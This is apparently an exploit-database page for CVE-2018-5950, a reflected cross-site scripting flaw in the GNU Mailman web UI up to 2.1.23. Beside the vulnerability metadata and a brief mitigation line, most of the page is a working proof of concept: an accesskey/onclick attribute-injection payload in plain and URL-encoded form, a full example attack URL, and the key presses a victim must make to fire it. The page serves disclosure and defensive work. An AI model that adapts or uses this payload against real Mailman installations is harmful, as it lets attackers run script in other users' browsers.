header-logo
Suggest Exploit
vendor:
Mailman
by:
Valerio Alessandroni
6.1
CVSS
MEDIUM
Reflected XSS
79
CWE
Product Name: Mailman
Affected Version From: >=1.x
Affected Version To: <=2.1.23
Patch Exists: YES
Related CWE: CVE-2018-5950
CPE: a:gnu:mailman:2.1.23
Metasploit: https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2018-5950/https://www.rapid7.com/db/vulnerabilities/suse-cve-2018-5950/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2018-5950/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2018-5950/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2018-5950/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2018-5950/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2018-5950/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2018-5950/https://www.rapid7.com/db/vulnerabilities/debian-cve-2018-5950/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp1-cve-2018-5950/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2018-5950/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2018-5950/
Other Scripts: N/A
Platforms Tested: None
2018

Mailman 1.x > 2.1.23 – Cross Site Scripting (XSS)

Cross-site scripting (XSS) vulnerability in the web UI in Mailman before 2.1.26 allows remote attackers to inject arbitrary web script or HTML via a user-options URL. An URL Encoded version of the payload is %22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22. In order to trigger the alert, the victim has to press the following buttons ALT+SHIFT+X where X is an arbitrary button inserted as accesskey attribute in the payload.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

# Title: Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)
# Type:			Reflected XSS
# Software:		Mailman
# Version:		>=1.x <= 2.1.23
# Vendor Homepage:	https://www.list.org
# Original link:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5950
# POC Author:		Valerio Alessandroni 
# Date: 		28/10/2020
# Description:		Cross-site scripting (XSS) vulnerability in the web UI in Mailman before 2.1.26 allows remote attackers to inject arbitrary web script or HTML via a user-options URL.
#
# https://127.0.0.1/cgi-bin/mailman/options/[LIST]/[EMAIL][XSS]
# Which [LIST] is a valid list, [EMAIL] is a valid email and [XSS] is the payload
#
# For this POC I used the following payload
# CVE:  CVE-2018-5950

"accesskey%3d"x"onclick%3d"alert`XSS`"

# Due the payload is loaded inside an HIDDEN INPUT TYPE, until today the only way to trigger the malicious code is via the accesskey attribute.
# An URL Encoded version of the payload is 

%22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22

# URL Example:

https://127.0.0.1/cgi-bin/mailman/options/list_name/test@test.com%22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22

# In order to trigger the alert, the victim has to press the following buttons ALT+SHIFT+X
# where X is an arbitrary button inserted as accesskey attribute in the payload.

Navigation

Suggest Exploit

Services By CQR